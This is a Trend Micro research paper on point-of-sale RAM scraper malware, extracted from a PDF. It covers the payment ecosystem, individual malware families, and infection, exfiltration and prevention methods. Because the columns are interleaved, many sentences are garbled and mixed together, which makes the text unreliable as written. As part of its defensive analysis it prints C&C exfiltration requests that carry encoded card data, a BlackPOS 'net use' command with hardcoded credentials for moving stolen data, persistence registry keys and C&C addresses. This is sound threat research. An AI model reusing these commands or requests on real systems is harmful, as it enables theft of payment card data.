WP Pos Ram Scraper Malware
WP Pos Ram Scraper Malware
WP Pos Ram Scraper Malware
Numaan Huq
Forward-Looking Threat Research Team
Trend Micro | PoS RAM Scraper Malware
CONTENTS
Introduction.....................................................................................................................................1
Early Warnings.........................................................................................................................1
Research Overview..................................................................................................................2
Payment-Processing Ecosystem....................................................................................................3
Low-Hanging Fruits..................................................................................................................9
The information provided herein is for general information and educational purposes only. It is not intended and should not be construed to constitute legal advice.
The information contained herein may not be applicable to all situations and may not reflect the most current situation. Nothing contained herein should be relied on
or acted upon without the benefit of legal advice based on the particular facts and circumstances presented and nothing herein should be construed otherwise. Trend
Micro reserves the right to modify the contents of this document at any time without prior notice.
Translations of any material into other languages are intended solely as a convenience. Translation accuracy is not guaranteed nor implied. If any questions arise
related to the accuracy of a translation, please refer to the original language official version of the document. Any discrepancies or differences created in the
translation are not binding and have no legal effect for compliance or enforcement purposes.
Although Trend Micro uses reasonable efforts to include accurate and up-to-date information herein, Trend Micro makes no warranties or representations of any kind
as to its accuracy, currency, or completeness. You agree that access to and use of and reliance on this document and the content thereof is at your own risk. Trend
Micro disclaims all warranties of any kind, express or implied. Neither Trend Micro nor any party involved in creating, producing, or delivering this document shall
be liable for any consequence, loss, or damage, including direct, indirect, special, consequential, loss of business profits, or special damages, whatsoever arising
out of access to, use of, or inability to use, or in connection with the use of this document, or any errors or omissions in the content thereof. Use of this information
constitutes acceptance for use in an “as is” condition.
Trend Micro | PoS RAM Scraper Malware
Rdasrv....................................................................................................................................11
Alina........................................................................................................................................13
VSkimmer...............................................................................................................................17
Dexter.....................................................................................................................................23
BlackPOS...............................................................................................................................28
Decebal..................................................................................................................................33
JackPOS.................................................................................................................................37
Soraya....................................................................................................................................38
ChewBacca............................................................................................................................38
BrutPOS.................................................................................................................................39
Backoff....................................................................................................................................40
What Will the Next Generation of PoS RAM Scrapers Look Like?..............................................42
General Characteristics..........................................................................................................43
Data Collection.......................................................................................................................46
Data Exfiltration......................................................................................................................49
Infection Methods.........................................................................................................................53
Inside Jobs........................................................................................................................53
Vulnerability Exploitation...................................................................................................54
Cyber Attacks....................................................................................................................56
Data-Exfiltration Methods.......................................................................................................58
Data Validation.......................................................................................................................59
Trend Micro | PoS RAM Scraper Malware
Detection Statistics.................................................................................................................65
EMV..................................................................................................................................70
Prevention..............................................................................................................................73
Hardware Based...............................................................................................................73
Software Based................................................................................................................73
Policy Based.....................................................................................................................74
Conclusion..............................................................................................................................75
Appendix......................................................................................................................................76
References...................................................................................................................................88
Trend Micro | PoS RAM Scraper Malware
INTRODUCTION
1
Trend Micro | PoS RAM Scraper Malware
2
Trend Micro | PoS RAM Scraper Malware
PAYMENT-PROCESSING ECOSYSTEM
Before delving into PoS RAM scraper others whose networks are used
malware analysis, let us first take a look to facilitate interactions between
at the payment-processing ecosystem— acquirers and issuers when
what parties are involved as well as how authorizing and settling transactions.
payment card transactions are authorized
and settled. This will help us understand • Payment service provider (PSP):
existing vulnerabilities in the ecosystem that Third-party service provider that
cybercriminals exploit. handles payment transactions
between merchants and multiple
Parties Involved in Credit Card acquirers. The advantage of using a
PSP is that merchants do not need
Transactions to set up and to maintain dedicated
communication channels with different
A credit card transaction is a multistep acquirers. Such a service is part of
process that involves several other parties, the PSP’s service package offerings.
apart from consumers and merchants.
The following briefly describe the different • Payment switch: In-house or third-
parties involved in credit-card-transaction party service provider that provides
processing: [7], [8], [9], [10] routing services between merchants
and multiple PSPs.
• Consumer: Cardholder who
purchases goods and services with a Consumers swipe their cards on merchants’
credit card. PoS devices to purchase goods and
services. The PoS devices send the credit
• Merchant: Goods and services card data to merchants’ PoS systems.
provider that accepts credit card The PoS systems contact the PSP, who,
payments. depending on what card brand or type was
used, contacts designated acquirers for
• Acquirer: Bank that processes and transaction authorization. Acquirers use the
settles a merchant’s credit card card brands’ networks to contact credit card
transactions with an issuer. issuers. Issuers return an authorization status
to acquirers via card brands’ networks. The
• Issuer: Bank or financial institution acquirers then pass on the authorization to
that issues credit cards to consumers. the PSP who forwards it to the PoS systems
and devices, which complete the transaction.
• Card brand: Visa, MasterCard®, This communication occurs in a matter of
American Express (AMEX)™, and seconds.
3
Trend Micro | PoS RAM Scraper Malware
Payment
Issuer service
provider
Payment
switch
Issuer
4
Trend Micro | PoS RAM Scraper Malware
Large merchants with high transaction funds via card brands’ networks to
volumes have a slightly different transaction acquirers.
flow model.
• Funding: Acquirers send merchants
Large merchants normally contract multiple payment via PSPs. Issuers then
PSPs in order to support a diverse range of bill cardholders the amount paid to
payment options (e.g., all major debit and merchants plus fees or interest.
credit card brands, gift cards, store-branded
cards, etc.) and to get the best transaction- Data takes on the following states in the
processing rates to reduce operating costs. transaction process:
PoS systems send transaction requests to
payment switches that route requests to the • Data in memory: All of the credit
appropriate PSPs for processing. The rest of card data is temporarily stored in
the process remains unchanged, apart from plain text in the RAM of merchants’
the additional payment switch step. PoS systems during processing.
Cybercriminals use PoS RAM
How Credit Cards Are Processed scrapers to steal this data.
5
Trend Micro | PoS RAM Scraper Malware
Track 1 Standard
SS FC PAN FS CN FS ED SC DD ES LRC
Track 2 Standard
SS PAN FS ED SC DD ES LRC
6
Trend Micro | PoS RAM Scraper Malware
IIN Range
Length
Card Brand (Card Number Validation
(Number of Digits)
Starts With)
34
AMEX 15 Luhn
37
54
Diners Club™ 16 Luhn
55
6011
622126‒622925
Discover 16 Luhn
644‒649
65
13
Visa 4 Luhn
16
7
Trend Micro | PoS RAM Scraper Malware
card numbers must pass the Luhn validation deployed worldwide. At this point, defining,
check. Note, the Luhn algorithm does not developing, and deploying a brand new
verify any other information on the card apart secure technology standard for payment
from the PAN. cards would be extremely expensive.
PoS RAM scrapers generally use regular PCI DSS has the following 12 major
expression (regex) matches to search for and requirements: [16]
harvest Tracks 1 and 2 credit card data from
the process memory space in the RAM. The • Install and maintain a firewall
following is a sample regex to find Track 2 configuration to protect cardholder
data: data.
8
Trend Micro | PoS RAM Scraper Malware
for implementing PCI DSS. Lack of federated abusing PCI DSS noncompliance, and others
implementation of PCI DSS means that to infect PoS systems.
payment systems are often insecure even if
they are theoretically PCI compliant. Merchants and vendors in the PoS
transaction chain are responsible for
Low-Hanging Fruits implementing PCI DSS. Note that merchants
are most susceptible to PoS RAM scraper
infections, as they are in the front line
Cybercriminals have found low-hanging of customer payment processing. Small
fruits for grabs within this layered security merchants such as small stores, independent
framework—unencrypted credit card data. retail outlets, neighborhood grocery stores,
After merchants swipe credit cards, the data and the like do not always possess the
stored on them temporarily resides in plain technical know-how to properly implement
text in the PoS software’s process memory or manage PCI DSS and so can become
space in the RAM. PoS RAM scrapers susceptible to targeted attacks. The only
retrieve a list of running processes and caveat for cybercriminals when targeting
load-inspects each process’s memory for small merchants is that they do not net
card data. They run searches on the process big card data volumes. Big merchants, on
memory space and can retrieve entire sets the other hand, have their own IT security
of Tracks 1 and 2 credit card data. The real departments and are PCI DSS compliant but
challenge lies in finding a reliable method are also lucrative targets for bigger payoffs.
to infect PoS systems with RAM scrapers. The end of 2013 showed that carefully
Cybercriminals use a variety of tried-and- planned targeted attacks could successfully
tested infection methods such as insider jobs, breach the IT defenses and steal credit card
spamming or phishing, social engineering, data from the PoS systems of even big name
credential theft, lateral movement from retailers.
existing infections, software exploitation,
9
Trend Micro | PoS RAM Scraper Malware
Dexter Soraya
Backoff
ALINA
Alina JackPOS
Rdasrv BrutPOS
BlackPOS
ver.2
10
Trend Micro | PoS RAM Scraper Malware
11
Trend Micro | PoS RAM Scraper Malware
12
Trend Micro | PoS RAM Scraper Malware
05492b4f4d6b819d54809ebca0980da133067e89 TSPY_POCARDL.BD
61395ad59bbb111aa2a84ccd1e1cb4da3c38211a TROJ_BANKER.QPA
df74d626df43247fdcd380bbc37b68f48b8c11d4 BKDR_HESETOX.SVC
daee813c73d915c53289c817e4aadaa6b8e1fb96 BKDR_HESETOX.SVC
2440cf33693651458b209b91e05d6466e4dc25dd TSPY_POCARDL.AJ
fb59188d718f7392e27c4efb520dceb8295a794f BKDR_HESETOX.SVC
06a0f4ed13f31a4d291040ae09d0d136d6bb46c3 BKDR_HESETOX.SVC
b8c1f7d28977e80550fcbaf2c10b222caea53be8 TSPY_BANKER.DPS
48db3a315d9e8bc0bce2c99cfde3bb9224af3dce BKDR_HESETOX.SVC
13
Trend Micro | PoS RAM Scraper Malware
14
Trend Micro | PoS RAM Scraper Malware
15
Trend Micro | PoS RAM Scraper Malware
CreateToolhelp32Snapshot
Process32First
Blacklist No OpenProcess
ReadProcessMemory No
Yes
Scrape process memory
for credit card data
Process32Next Blacklist
Yes
Figure 11: Regexes used to match Tracks 1 and 2 credit card data
16
Trend Micro | PoS RAM Scraper Malware
Figure 12: Alina submits the scraped data to a remote server via HTTP POST
4e682b34c3e122e55d21f9a501b9f13afb7437a9 BKDR_ALINA.KER
5563e4c2987eda056b3f74716c00d3014b9306bc BKDR_ALINA.NA
a368829bc400284f1803f4e5de5844ae4ccdedf1 BKDR_ALINA.OJ
aadb31534bd276fa2f3029e89e93140a48a5ce0d BKDR_ALINA.ON
2e3e8a3454262016d1d453c702a0dc8b42e29d5f TROJ_INJECT.AWH
VSkimmer
17
Trend Micro | PoS RAM Scraper Malware
The VSkimmer tool has an easy-to-configure unlikely. If the current process is not in the
builder interface. The user-configured blacklist, VSkimmer opens the process
parameters are applied to a stub file that object using OpenProcess and reads the
comes bundled with the builder in order memory content via ReadProcessMemory.
to generate a customized executable file. The sample we analyzed only has the regex
The builder appends a section called “_ to match Track 2 credit card data hardcoded
Xyl2k_” to the stub. The sample built was in its binary, however, other versions may
configured with the remote server address, have regexes to match both Tracks 1 and 2
www . myexampleserver . co . cc, and renamed credit card data. The regex to match Track 2
to java.exe. credit card data runs on the process memory
content that VSkimmer reads.
When first executed, the malware copies
itself to the %APPDATA% directory using When the regex matching on the process
the user-configured filename, java.exe. memory is completed, VSkimmer retrieves
It adds itself to an Auto Start runkey with the next process recorded in the snapshot
the user-configured name, PCI Compliant using Process32Next and the inspection
SCard. It also adds itself to the firewall as cycle is repeated. The malware implements
an authorized application via the following two data-exfiltration methods. Online, it uses
registry keys: HTTP GET to exfiltrate the Tracks 1 and 2
credit card data that it scrapes and sends it
HKEY_LOCAL_MACHINE\SOFTWARE\ to a user-configured C&C server address.
Microsoft\Windows\CurrentVersion\ Most PoS RAM scrapers use HTTP POST
Run\PCI Compliant SCard value: unlike VSkimmer, which uses HTTP GET.
%APPDATA%\java.exe
The stolen card data is encoded as a Base64
string and is appended to the user-configured
HKEY_LOCAL_MACHINE\SYSTEM\ URL path, /api/process.php?xy=.
ControlSet001\Services\
SharedAccess\Parameters\ The following is a sample HTTP GET request
FirewallPolicy\StandardProfile\ to a C&C server:
AuthorizedApplications\
List\%APPDATA%\java.exe http://www.myexampleserver.co.cc/
api/process.php?xy=NDAwMDAwMDAwMDA
VSkimmer is now ready to scrape the wMDAwMj0xNTA0MTAxMTAwMDA0ND##
process memory for Tracks 1 and 2 credit
card data. It inspects running processes VSkimmer also has manual data-exfiltration
using the CreateToolhelp32Snapshot method functionality. If infected systems are
that PoS RAM scrapers commonly use. offline, it looks for a removable drive called
“KARTOXA007” (i.e., user-configurable drive
VSkimmer calls CreateToolhelp32Snapshot name) and dumps all of the credit card data it
to take a snapshot of all of the currently harvests in a file called “dmpz.log” (i.e., user-
running processes on the system as well configurable filename) on the drive. If a C&C
as the heaps, modules, and threads that server cannot be reached and no removable
they use. It then calls Process32First, which drives are connected to the infected systems,
retrieves information about the first process the data is dumped in a text file called
encountered in the snapshot. It maintains a “compliant.dat.”
blacklist of processes (e.g., smss.exe, csrss.
exe, winlogon.exe, etc.) to skip because VSkimmer also has bot functionality. It can
finding credit card data in the process receive and parse the commands, upd and
memory space of those processes is highly dlx, from C&C servers. The upd command
18
Trend Micro | PoS RAM Scraper Malware
19
Trend Micro | PoS RAM Scraper Malware
20
Trend Micro | PoS RAM Scraper Malware
Figure 16: VSkimmer reads the process memory and searches for Track 2 credit card data
Figure 17: VSkimmer encodes stolen data as a Base64 string and appends it to a user-configured URL
path
21
Trend Micro | PoS RAM Scraper Malware
8b7e8d5ddd0c3ac657d358df7f70090204efb9e1 TROJ_HESETOX.D
fc7528e8dced7d70d92923b645c51885ac652e1e TSPY_POCARDL.DAM
d541441ed4d475e79e95c8c7f550a24922c3ffdb BKDR_HESETOX.SMJ
31dad731919e20c0cb3ce98efc01daea4ac34f21 TSPY_POCARDL.AK
22
Trend Micro | PoS RAM Scraper Malware
23
Trend Micro | PoS RAM Scraper Malware
information and exfiltrated data is validated is hardcoded in its binary. It has a constructor
offline. function that fills in preassigned variables
with exfiltrated data. The data is encoded as
In addition to Tracks 1 and 2 credit card a Base64 string and sent out as an HTTP
data, Dexter also collects system information POST request.
and logs keystrokes. It installs a keylogger
component, SecureDll.dll, in the current The following is a sample HTTP POST
%WorkingDir%. It enables the hidden file request that Dexter sends:
attribute on SecureDll.dll so it will not be
visible in Windows® Explorer. SecureDll.dll Connection: 63.165.250.100:80
exports the following functions: Content: POST/w1921831741862103104
1543/gateway.php HTTP/1.1\r\
• KeyloggerDll_1 nContent-Type: application/x-www-
form-urlencoded\r\nUser-Agent:
Mozilla/4.0[compatible; MSIE 7.0b;
• KeyloggerDll_2
Windows NT 6.0]\r\nHost: www.w1n4.
com\r\nContent-Length: 173\r\
KeyloggerDll_* functions call the nCache-Control: no-cache\r\n\r\=
GetKeyboardState API, which returns the WltXUFZbAFdOVFVTUk5XWgdXTgIFUlpO
status of the 256 virtual keys to a specified AAZWUQEHVQVWBVoG&unm=IgcOCg0KEBc
buffer. Dexter calls LoadLibrary to load the RAhcMEQ==&cnm=BwBOBQoPBhARFQ==&
functions that SecureDll.dll exports and query=NAoNBwwUEEM7Mw==&spec=UFF
calls SetWindowsHookEx to hook handlers, DIQoX&opt=Ww&var=MBcCEScWEBc=&val=
WH_KEYBOARD (i.e., monitor keyboard c3ltY2c=
input) and WH_GETMESSAGE (i.e., monitor
mouse and keyboard input). These allow The following table shows the variables that
Dexter to intercept all of the keystrokes made Dexter uses in HTTP POST requests. [24], [25]
on infected systems.
Variable Value
page Mutex
ks Keylogger
opt Unknown
unm Username
24
Trend Micro | PoS RAM Scraper Malware
Variable Value
cnm Hostname
spec Architecture
query OS
Command Description
Dexter is one of the most potent PoS RAM This is very dangerous in a corporate
scraper families because its data-theft environment because it can steal sensitive
activities are not limited to only stealing credit corporate information entered into PoS
card data. It also steals system information systems. [26]
and installs a keylogger on infected systems.
25
Trend Micro | PoS RAM Scraper Malware
Figure 19: Dexter captures running processes using the CreateToolhelp32Snapshot method and checks
a blacklist for processes to skip
Figure 21: Custom search function that Dexter applies to 64k-sized chunks of memory
26
Trend Micro | PoS RAM Scraper Malware
Figure 22: Custom search function that Dexter uses to look for identifier bytes
27
Trend Micro | PoS RAM Scraper Malware
f07f40f0b17a4d282e1c55b3a23b331b1f78c4d0
BKDR_DEXTR.SMM
a8bb7ce5e8616241a268666cd07926938dfbbe44
32ed9f0beae53f1928bf5727111efbf81df9ac96 TSPY_DEXTER.CA
408d63a01e8e111181db921f1bf603e1a76622cf TROJ_PINCAV.TF
28
Trend Micro | PoS RAM Scraper Malware
data. Similar to Dexter, BlackPOS’s goal is message body, meanwhile, uses the
to be efficient rather than to collect quality greeting, “Hi Buddy.”
information and exfiltrated data is validated
offline. • Exfiltration via direct FTP
upload: This can be done without
The original BlackPOS malware is a simple affected users’ knowledge. The
command line tool that supports user-defined FTP credentials, hardcoded in the
search patterns. This makes BlackPOS a BlackPOS binary, are used to log in
flexible tool that can search for all kinds of to a remote FTP server and to upload
pattern in the process memory space without the text file with the stolen credit card
requiring code modification. data.
The credit card data found in the process • Exfiltration via file copy to a remote
memory can be seen on a command window server: The BlackPOS variant
or written to a file on disk. The sample we used in the Target credit card data
analyzed dumps the data in a file called breach dropped the stolen data in
“output.txt.” a text file called “winxml.dll” in the
%WINDIR%\<system32> directory.
There is a seven-hour sleep cycle
after which the malware copies the
data that it collects to a compromised
dump server on the same network
using the following system
commands:
%windir%\system32\cmd.exe/cnet
use S:\\10.116.240.31\c$\WINDOWS\
Figure 25: Sample credit card data that twain_32/user:ttcopscli3acs\Best1_
BlackPOS finds user BackupU$r
29
Trend Micro | PoS RAM Scraper Malware
for custom patterns to search the process of BlackPOS’s features make it a successful
memory means that BlackPOS can steal a data breach tool. Its success, unfortunately,
wide range of data. The results are always means that it will further evolve and be used
written to a text file that can be exfiltrated in more data breach attacks in the future.
using the method above, among others. All
METHOD 1 METHOD 2
EnumProcesses
OpenProcess EnumProcesses
AProcesses[I] AProcesses[I]
OpenProcess OpenProcess
ReadProcessMemory ReadProcessMemory
Proceed_
Write_Data_To_File Custom_Search_Func to_next_X
Yes Write_Data_To_File No
Searched_all_
Memory?
30
Trend Micro | PoS RAM Scraper Malware
31
Trend Micro | PoS RAM Scraper Malware
Figure 30: BlackPOS can copy a data file to a compromised dump server that resides on the same
network
e9239277190ea33470738ddf3aa48a0a41c4753b
TSPY_POCARDL.SM
b20d49115653946ae689d0d572fdfc483ea04cc5
8a6af8587adf0e743871ad6b9889428b5f75b86b TSPY_POCARDL.AB
71983a80541ec714d59fb91575f6bfd4fcdda8b1 TSPY_POCARDL.U
32
Trend Micro | PoS RAM Scraper Malware
Decebal also retrieves the name of any • &av: Installed anti-malware solution
anti-malware solution installed on infected name
systems. This information is exfiltrated to a
remote server, along with the stolen Tracks 1 • &os: OS
and 2 credit card data.
• &tr2: Track 2 credit card data
Decebal inspects all of the running
processes using a slightly modified version The remote server runs a simple PHP script
of the CreateToolhelp32Snapshot method to monitor incoming connection requests.
that PoS RAM scrapers commonly use. It
calls CreateToolhelp32Snapshot to take a The servers strip out the variables from the
snapshot of all of the running processes HTTP headers that it receives and converts
on infected systems, along with the heaps, the hexadecimal-encoded values into strings
modules, and threads that they use. It then and writes them to a text file.
calls Process32Next inside a do-while
loop. [33] Decebal maintains a blacklist of Decebal infects systems via drive-by-
processes (e.g., svchost.exe, csrss.exe, download attacks or by luring potential
wininit.exe, etc.) to skip because finding victims to compromised websites. It can also
credit card data in the memory of these be dropped by other malware. The leaked
processes is highly unlikely. If a current source code means that, like BlackPOS,
process being inspected is not in the it can be easily modified to add new
blacklist, it opens the process object using functionality for use in data breach attacks.
33
Trend Micro | PoS RAM Scraper Malware
Figure 34: Decebal uses the CreateToolhelp32Snapshot method to search for Track 2 credit card data
34
Trend Micro | PoS RAM Scraper Malware
35
Trend Micro | PoS RAM Scraper Malware
1f3d59d4e537911f7719e2b5f55723a7e7bfae88
8d8dca6aed3d6688910a3bbedd1ce562e45d9ac4 TSPY_DECBAL.A
42e55bfad0677cc810cfb08a4cf4cf668725b3c8
36
Trend Micro | PoS RAM Scraper Malware
PoS RAM scraper attacks are still prevalent, This watchdog ensures that the JackPOS
as evidenced by all of the new malware process is always running. If the process is
families that are constantly being discovered. not running or is terminated, the watchdog
Recently discovered families show that the spawns a new JackPOS process.
next generation of PoS RAM scrapers are
extensively reusing ideas and functionality JackPOS uses the
seen in already-existing families, along with CreateToolhelp32Snapshot method to
new feature additions. inspect all running processes for Tracks 1
and 2 credit card data. Like Alina, it maintains
JackPOS a blacklist of processes to skip. Instead of
using regex matching, JackPOS uses a
custom search function to look for identifier
JackPOS is an Alina-inspired PoS RAM bytes, followed by the correct number of
scraper family first discovered at the digits, in order to find Tracks 1 and 2 credit
beginning of 2014. [34], [35] It does not card data in the process memory. It exfiltrates
share a code base with Alina but heavily the stolen data using HTTP POST and
borrows ideas and functionality from the Base64-encodes the content. It also sends
latter. When first executed, JackPOS installs infected systems’ MAC addresses to C&C
itself on the %APPDATA% directory. Like servers, possibly using them as identifiers. It
Alina, JackPOS maintains a list of socially also has a bot functionality and can process
engineered filenames, all related to Java™, commands such as the following:
and installs itself using a filename from
the said list. It also adds itself to an Auto • update: Update itself
Start runkey to maintain persistence. It also
drops a watchdog program in %TEMP%. • kill: Remove itself (kill switch)
9d78ff3123e485eda287aed83c1c2dc9d3de02d5
a6916594f407c1d2cc794146d90062fc8e6dcd98
2f3d2d6a28a2532267f8f6affd8e70d203f0d00d TSPY_JACKPOS.A
9c0117a66cf460bdb0cc211a4f13a170cc88b4f7
5cad762578ba264f677d83b8ecd84158b264f9ef
37
Trend Micro | PoS RAM Scraper Malware
0BE287EEFE96EE1519A37A0F6C6A547EF043E80E
TSPY_SORAYA.A
E70F9BADB8C97296B11732B63B4E512640249712
38
Trend Micro | PoS RAM Scraper Malware
bytes, followed by the correct number encrypts all traffic by default. The sample
of digits, in order to find Tracks 1 and 2 analyzed accessed the C&C server,
credit card data in the process memory. http :// 5ji235jysrvwfgmb . onion /, which uses a
It then retrieves victims’ IP addresses .onion pseudo-top-level domain (TLD). Note
by visiting http :// ekiga . net / ip / and then that a .onion TLD cannot be resolved outside
establishes a Tor circuit for anonymity. Tor the Tor network and can only be accessed by
conceals C&C servers’ IP addresses and using a Tor proxy application.
0392F25130CE88FDEE482B771E38A3EAAE90F3E2 TSPY_FYSNA.A
fb357bb5d9c2de75afa69bfec8c22041b02e03df TROJ_TIBRUN.B
39
Trend Micro | PoS RAM Scraper Malware
2cf34b70906779c9e230c5ffce4179f4f58eea5a
TROJ_TIBRUN.SM
11b7430026c82097657c145dcedfa818bf1032d3
40
Trend Micro | PoS RAM Scraper Malware
2cf34b70906779c9e230c5ffce4179f4f58eea5a
TSPY_POSLOGR.A
11b7430026c82097657c145dcedfa818bf1032d3
caf546e3ee1a1d2768ec37428de1ff7032beea94 TSPY_POSLOGR.B
85e9fcc38b1683f94e12a438cbea17679bb8b724
TSPY_POSLOGR.C
66c83acf5b852110493706d364bea53e48912463
41
Trend Micro | PoS RAM Scraper Malware
2011 Rdasrv
BlackPOS
2012 Alina
Dexter
VSkimmer
2013
ChewBacca
42
Trend Micro | PoS RAM Scraper Malware
Decebal
JackPOS
Soraya
2014
BrutPOS
Backoff
BlackPOS ver. 2
43
Trend Micro | PoS RAM Scraper Malware
Characteristic Rdasrv BlackPOS Alina Dexter VSkimmer ChewBacca Decebal JackPOS Soraya BrutPOS Backoff Number
Collects
system 7
information
Uses a
single 7
component
Uses socially
engineered 6
filenames
Updates
5
itself
Has bot
5
functionality
Uses
multiple 4
components
Is packed 3
Pretends to
3
be Java
Has a kill
3
switch
44
Trend Micro | PoS RAM Scraper Malware
Characteristic Rdasrv BlackPOS Alina Dexter VSkimmer ChewBacca Decebal JackPOS Soraya BrutPOS Backoff Number
Hooks APIs 3
Installs a
watchdog 2
process
Injects code 2
Attacks
systems
with weak 2
or default
password
Uses
multiple
1
exfiltration
methods
45
Trend Micro | PoS RAM Scraper Malware
Overall, the following top general that search for specific patterns
characteristics of PoS RAM scrapers were or functionality for detection and
identified: blocking purposes.
• They use socially engineered • They have a kill switch that allows
filenames when installed in order to them to remove themselves.
avoid drawing unwanted attention.
As shown, two of the top general
• They can update themselves. characteristics of PoS RAM scrapers
discovered in 2014 are present in the list of
• They have bot functionality and can top overall characteristics.
receive commands from C&C servers.
Data Collection
The following top general characteristics of
PoS RAM scrapers discovered in 2014 were
also identified: The following table lists the RAM-scraping
and other data-collection techniques
• They are custom-packed in order observed among the PoS RAM scraper
to obfuscate their code. This helps families featured in this paper.
them defeat anti-malware signatures
46
Trend Micro | PoS RAM Scraper Malware
Technique Rdasrv BlackPOS Alina Dexter VSkimmer ChewBacca Decebal JackPOS Soraya BrutPOS Backoff Number
Uses the
CreateToolhelp
7
32Snapshot
method
Uses a
7
blacklist
Has a custom
7
search function
Uses regexes 4
Uses Base64
to encode data 4
for exfiltration
Stores results
3
in logfiles
Performs Luhn
3
validation
Logs
3
keystrokes
Targets known
PoS systems 2
or applications
47
Trend Micro | PoS RAM Scraper Malware
Technique Rdasrv BlackPOS Alina Dexter VSkimmer ChewBacca Decebal JackPOS Soraya BrutPOS Backoff Number
Encrypts data
2
for exfiltration
Encodes data
as hex digits 2
for exfiltration
48
Trend Micro | PoS RAM Scraper Malware
Overall, the following top data-collection • They use a blacklist to avoid scanning
techniques used by PoS RAM scrapers were processes wherein Tracks 1 and 2
identified: credit card data cannot be found.
• They use a blacklist to avoid scanning • They encode data as a Base64 string
processes wherein Tracks 1 and 2 in order to obfuscate their content.
credit card data cannot be found.
• They compute a Luhn checksum to
• They look for Tracks 1 and 2 credit validate the Tracks 1 and 2 credit card
card data using a custom search data that they scrape.
function—a fast method but does not
necessarily deliver quality results. As shown, four of the top data-collection
techniques PoS RAM scrapers discovered
• They search for Tracks 1 and 2 credit in 2014 use are in the overall list. Using
card data via regex matching, which the CreateToolhelp32Snapshot method,
is a slow process. blacklists, and custom search functions
have proven to be the most efficient way
• They encode data as a Base64 string of harvesting Tracks 1 and 2 credit card
in order to obfuscate their content. data from the process memory in infected
systems’ RAM.
The following top techniques among PoS
RAM scrapers discovered in 2014 were also Data Exfiltration
identified:
49
Trend Micro | PoS RAM Scraper Malware
Technique Rdasrv BlackPOS Alina Dexter VSkimmer ChewBacca Decebal JackPOS Soraya BrutPOS Backoff Number
Uses HTTP
5
POST
Data is
manually 2
removed
Uses FTP
2
servers
Uses HTTP
1
GET requests
Sends stolen
data via HTTP 1
header
Uses Tor 1
Uses emails
or Simple
Mail Transfer 1
Protocol
(SMTP)
Uses network
1
shares
50
Trend Micro | PoS RAM Scraper Malware
Technique Rdasrv BlackPOS Alina Dexter VSkimmer ChewBacca Decebal JackPOS Soraya BrutPOS Backoff Number
Data is
exfiltrated via
1
removable
devices
51
Trend Micro | PoS RAM Scraper Malware
It is clear from the table above that HTTP featured in this paper. Combining functionality
POST requests are the preferred data- from each distinct category allowed for
exfiltration method by both pre- and 2014 predicting the creation of dozens of working
PoS RAM scrapers. This is because HTTP next-generation PoS RAM scrapers. Note
POST requests are not cached, not saved that not all permutations will work. Innovative
in history, and have no restrictions on data- cybercriminals may figure out new ways to
sending length. exploit holes found in PCI DSS requirements
and how to breach systems by crafting new
The lists presented above are by no means data-gathering and -exfiltration techniques.
exhaustive, as they only contain functionality Even worse, these innovative features will
observed among the PoS RAM scrapers surely be quickly replicated by their peers.
52
Trend Micro | PoS RAM Scraper Malware
INFECTION METHODS
53
Trend Micro | PoS RAM Scraper Malware
emails, making them easy attack targets. Once installed, PoS RAM scrapers normally
Phishing emails generally deliver malware rename themselves using inconspicuous
payloads in the following ways: filenames to evade detection. Some of the
socially engineered filenames that PoS RAM
• As attachments: Some emails come scrapers use include the following:
with an attachment and use social
engineering lures in the message • java.exe
body to convince recipients to
download and open the attached file. • mmon32.exe
The attachments used are commonly
.ZIP files that contain a malicious • taskmgr.exe
executable file. The executable
files, meanwhile, are disguised as • adobeflash.exe
commonly used files (e.g., .DOC,
.PDF, .XLS, or other files). Some • windowsfirewall.exe
disguised executable files can also
PoS attacks that rely on phishing and social
be directly attached to emails instead
engineering usually succeed against small
of being archived. These files are
businesses with limited technical resources
usually droppers or downloaders that
or capabilities. But they are, in theory, less
stealthily install PoS RAM scrapers
effective against big companies that have
on systems. Another strategy could
proper operations security policies in place.
involve attaching malicious .PDF or
Of course, some big corporations have been
.DOC files to emails. When opened,
known to succumb to seemingly simple social
the malicious code embedded in the
engineering attacks, making this technique
files stealthily download and install
extremely effective.
PoS RAM scrapers on systems.
54
Trend Micro | PoS RAM Scraper Malware
NOTE: All mentions of “detections” within the text refer to instances when threats were found on users’
computers and were subsequently blocked by any Trend Micro security software. Unless otherwise
stated, the figures featured in this report were based on data gathered by the Trend Micro Smart
Protection Network cloud security infrastructure, which uses a combination of in-the-cloud technologies
and client-based techniques to support on-premise products and hosted services.
It is worrisome to see that Windows XP, will no longer receive patches. Vulnerabilities
Windows Server 2000, and Windows Server discovered on other Windows versions that
2003 were still being used after Microsoft may also exist on the unsupported OSs will
ended support for the first two OSs as well as not get patched as well. Support for Windows
mainstream support for the third. This means Server 2003 has been extended until 2015
that new vulnerabilities found in these OSs so it still receives some patches. On the flip
55
Trend Micro | PoS RAM Scraper Malware
side, companies running the latest OSs are • Implement log and audit trails on
also at risk if they do not regularly patch systems.
software or perform system maintenance.
• Install and regularly update anti-
PCI DSS NONCOMPLIANCE ABUSE malware solutions installed on
systems.
As previously mentioned, although PCI DSS
Hardening systems and networks is not a
does not offer new secure technologies
trivial task. Companies that lack expertise
to protect electronic payment systems, it
or resources often incorrectly configure
does provide requirements to implement
their PoS systems and networks, making
additional layers of security control around
them susceptible to different attacks that
existing ones. Some of the key PCI
compromise them by installing malware.
DSS requirements to secure operating
environments include but are not limited to
CYBER ATTACKS
the following:
COMPANY B
Router PoS
Credit card Switch System
Switch Router
PoS
INTERNET Back-office database server System
HQ
56
Trend Micro | PoS RAM Scraper Malware
Once entry is gained, attackers then set data exfiltration. In attacks targeting PoS
up an initial beachhead and establish systems, they identify devices and infect
communication with C&C servers. They them with RAM scrapers. If they are lucky
then download additional tools and and succeed in compromising a System
malicious binaries while performing in-depth Center Configuration Manager (SCCM)
reconnaissance of the entire network to server, they can centrally deploy PoS
collect credentials (e.g., password hashes), RAM scrapers to all of the PoS systems
locate databases, scan ports, discover the that it manages. Similarly, compromising
network topography, audit OS environments, a whitelisting server would allow them to
identify host-naming conventions, and others. whitelist their malware to evade discovery.
They use the reconnaissance data for lateral
movement throughout the network and for
BRANCH NETWORK
PoS
system
Switch Router
COMPANY B
PoS
Credit card Router system
Switch
Switch Router
Back-office database server PoS
INTERNET system
HQ
Figure 40: Attackers laterally move throughout the target network
Attacks like this are meticulously planned maintain persistence. A sophisticated attack
and well-executed, making them difficult can also use a kill switch to remove all traces
to detect. Attackers also set up multiple of infection with a single command issued via
backdoors across the network in case one a C&C server.
is discovered and blocked, allowing them to
57
Trend Micro | PoS RAM Scraper Malware
FTP server
C&C server
Compromised site
